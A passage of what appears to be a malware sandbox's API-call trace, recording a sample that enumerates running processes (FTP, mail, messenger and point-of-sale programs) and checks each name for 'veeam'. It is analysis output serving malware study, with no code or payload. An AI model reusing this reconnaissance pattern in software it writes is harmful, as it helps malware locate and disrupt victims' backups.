lpMultiByteStr=0x3542478, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0092.003] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0092.003] StrStrIA (lpFirst="filezilla.exe", lpSrch="veeam") returned 0x0 [0092.003] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0092.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.004] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3542490 [0092.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3542490, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0092.004] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0092.004] StrStrIA (lpFirst="flashfxp.exe", lpSrch="veeam") returned 0x0 [0092.004] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0092.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.005] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35424a8 [0092.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x35424a8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0092.005] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0092.005] StrStrIA (lpFirst="fling.exe", lpSrch="veeam") returned 0x0 [0092.005] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0092.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0092.006] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35367b0 [0092.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x35367b0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0092.007] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0092.007] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="veeam") returned 0x0 [0092.007] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0092.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0092.008] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3536850 [0092.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x3536850, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0092.008] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0092.008] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="veeam") returned 0x0 [0092.008] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0092.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0092.009] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35476e8 [0092.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x35476e8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0092.009] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0092.009] StrStrIA (lpFirst="icq.exe", lpSrch="veeam") returned 0x0 [0092.009] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0092.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.019] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3542508 [0092.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3542508, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0092.019] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0092.020] StrStrIA (lpFirst="leechftp.exe", lpSrch="veeam") returned 0x0 [0092.020] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0092.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.022] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35424c0 [0092.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x35424c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0092.022] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0092.022] StrStrIA (lpFirst="ncftp.exe", lpSrch="veeam") returned 0x0 [0092.022] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0092.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.024] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35423d0 [0092.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x35423d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0092.024] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0092.024] StrStrIA (lpFirst="notepad.exe", lpSrch="veeam") returned 0x0 [0092.024] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0092.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.025] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35424d8 [0092.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x35424d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0092.025] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0092.025] StrStrIA (lpFirst="operamail.exe", lpSrch="veeam") returned 0x0 [0092.025] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0092.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.027] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35424f0 [0092.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x35424f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0092.027] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0092.027] StrStrIA (lpFirst="outlook.exe", lpSrch="veeam") returned 0x0 [0092.027] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0092.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.028] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3542a28 [0092.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3542a28, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0092.028] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0092.028] StrStrIA (lpFirst="pidgin.exe", lpSrch="veeam") returned 0x0 [0092.029] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0092.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.030] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35429c8 [0092.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x35429c8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0092.030] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0092.030] StrStrIA (lpFirst="scriptftp.exe", lpSrch="veeam") returned 0x0 [0092.030] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0092.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.031] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3542920 [0092.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3542920, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0092.032] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0092.032] StrStrIA (lpFirst="skype.exe", lpSrch="veeam") returned 0x0 [0092.032] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0092.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.034] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35429e0 [0092.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x35429e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0092.034] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0092.034] StrStrIA (lpFirst="smartftp.exe", lpSrch="veeam") returned 0x0 [0092.034] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0092.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.036] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3542b00 [0092.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x3542b00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0092.036] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0092.036] StrStrIA (lpFirst="thunderbird.exe", lpSrch="veeam") returned 0x0 [0092.036] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0092.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.037] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3542a58 [0092.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3542a58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0092.037] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0092.037] StrStrIA (lpFirst="totalcmd.exe", lpSrch="veeam") returned 0x0 [0092.037] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0092.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.038] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3542938 [0092.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3542938, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0092.038] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0092.038] StrStrIA (lpFirst="trillian.exe", lpSrch="veeam") returned 0x0 [0092.039] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0092.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.040] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3542950 [0092.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3542950, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0092.040] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0092.040] StrStrIA (lpFirst="webdrive.exe", lpSrch="veeam") returned 0x0 [0092.040] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0092.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.041] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3542a88 [0092.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3542a88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0092.041] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0092.041] StrStrIA (lpFirst="whatsapp.exe", lpSrch="veeam") returned 0x0 [0092.041] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0092.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.042] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35429f8 [0092.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x35429f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0092.043] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0092.043] StrStrIA (lpFirst="winscp.exe", lpSrch="veeam") returned 0x0 [0092.043] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0092.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0092.044] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35368d0 [0092.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x35368d0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0092.044] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0092.044] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="veeam") returned 0x0 [0092.044] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0092.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0092.045] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3536930 [0092.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x3536930, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0092.045] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0092.045] StrStrIA (lpFirst="active-charge.exe", lpSrch="veeam") returned 0x0 [0092.045] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0092.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.047] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35428a8 [0092.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x35428a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 